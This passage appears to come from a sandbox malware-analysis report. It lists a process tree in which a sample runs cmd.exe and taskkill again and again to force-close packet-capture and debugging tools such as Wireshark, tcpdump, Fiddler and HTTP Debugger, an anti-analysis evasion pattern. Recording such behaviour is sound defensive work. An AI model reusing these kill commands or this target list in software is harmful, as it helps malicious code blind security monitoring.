        PID:2088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:2412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:5012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4308
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:2276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3892
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:5036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2240
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4136
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:5084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1144
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:5012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4172
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2500
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4156
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3336
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4416
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:768
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1352
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4048
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4916
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:2868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2240
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3428
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:5052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:640
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:5032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4504
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4552
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:5108
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2860
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4048
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:64
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3716
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:5024
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:1476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4828
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2972
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:5096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:1408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4524
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3596
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2240
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2444
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:2496
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3028
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:1760
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1640
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1880
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:5076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3952
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3812
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:32
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:1408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:3992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:736
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:2256
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2496
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:5064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2272
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4644
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3164
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:5096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4204
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3552
      - C:\Windows\system32\cmd.exe
        
